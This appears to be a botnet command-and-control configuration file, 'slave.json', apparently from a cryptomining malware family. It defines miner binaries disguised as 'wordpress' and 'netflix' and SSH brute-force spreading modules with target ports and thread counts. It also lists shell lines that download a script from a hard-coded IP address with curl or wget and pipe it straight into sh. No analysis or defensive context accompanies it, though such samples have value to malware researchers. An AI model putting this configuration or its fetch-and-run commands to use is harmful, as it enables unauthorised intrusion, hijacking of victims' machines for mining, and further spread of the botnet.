/
slave.json
72 lines (72 loc) · 3.13 KB
/
slave.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
{
"Data": {
"CfgVer":66,
"Config":{
"Interval":"60s"
},
"Miner":[
{
"Exe":"/usr/local/bin/wordpress",
"Md5":"d146612bed765ba32200e0f97d0330c8",
"Url":"/static/wordpress"
},
{
"Exe":"/usr/bin/wordpress",
"Md5":"d146612bed765ba32200e0f97d0330c8",
"Url":"/static/wordpress"
},
{
"Exe":"/tmp/netflix",
"Md5":"8ccb87dcbcaea2b3d0af7c7a89acb5e9",
"Url":"/static/netflix"
}
],
"Cmd":{
"AALocalSSH":{
"Id":3035,
"Version":5023,
"UrlPath":"/static/5023/ddgs",
"Timeout":"1m"
},
"AAssh":{
"Id":2147,
"Version":5023,
"UrlPath":"/static/5023/ddgs",
"NThreads":100,
"Duration":"480h",
"IPDuration":"12h",
"GenLan":True,
"GenAAA":False,
"Timeout":"1m",
"Ports":[
22,
1987,
2222,
22222,
12222
]
},
"Sh":[
{
"Id":952,
"Version":4005,
"Line":"(curl -fsSL http://67.205.168.20:8000/i.sh||wget -q -O- http://67.205.168.20:8000/i.sh) | sh",
"Timeout":"120s"
},
{
"Id":953,
"Version":5018,
"Line":"(curl -fsSL http://67.205.168.20:8000/i.sh||wget -q -O- http://67.205.168.20:8000/i.sh) | sh",
"Timeout":"120s"
},
{
"Id":951,
"Version":-1,
"Line":"ps auxf|grep -v grep|grep \"\\(Trump\\|Macron\\|hwloc\\|Italia\\)\"",
"Timeout":"120s"
}
]
}
},
"Signature": "\x25\x1D\x17\xEA\x42\x83\x7B\x80\x56\xE9\x0A\xDF\xF8\xC9\xF9\xCC\xF6\x94\x7C\x91\x7F\x59\xDD\xA2\x75\x29\x41\x46\x86\xC6\xF7\x94\xA9\xB7\x42\x0A\x66\x94\xA8\xE7\x17\x76\x0A\xAF\xD7\x3F\x5E\x62\x11\xF3\xDE\x74\x6F\x0A\xBC\x77\x5A\xCB\x7F\x84\x3A\x04\x3F\xC2\xD3\x00\xDF\xE2\x99\xD0\x9C\xB7\x89\x9F\x8B\x26\xBA\xE3\x55\xD6\xFD\x9F\xF7\x5F\xB8\x20\x6D\x76\x67\x10\xED\x89\xA4\x3D\x38\xF0\xD8\x99\x1C\xE0\xA5\x92\x90\x15\x33\xA6\x44\xBA\x04\xB9\xAD\x60\x08\xF8\x97\xF8\xEF\xFA\x5E\xC6\x25\x3F\xE6\x39\x83\x9A\xAF\xC1\x08\x12\xE6\xF8\x01\x87\x68\x47\xF4\x37\x9A\x8A\x20\xC6\x73\x44\xB5\x26\x30\x71\x9E\x2B\x30\xBB\xDC\x7B\xB9\xAA\x3E\xC0\x11\x17\xB4\x7E\x37\xA7\xAC\xF6\x85\x1A\x85\x6E\x36\x9C\x51\x10\x7B\x54\x7C\xAB\xB8\xFE\xE0\xE3\xFE\x79\x30\x70\x31\x39\xA0\xA9\x84\x6D\xA6\x0C\x33\x66\x8C\xAD\xBF\x54\xC5\xC9\x20\xB4\x4C\xB2\x06\x34\x71\x23\xCD\x4F\x6E\x5E\xD1\x40\x12\x18\xED\x85\x0A\xA6\x7B\x62\x09\x5E\x05\x0A\x68\xDC\xED\xD9\x57\xDC\xD4\x2B\xDC\xCD\xF0\x04\x03\x72\x23\x1A\x39\x98\x42\x3F\x33\xF7\x15\x31\xA8\xE6\xF2\x13"
}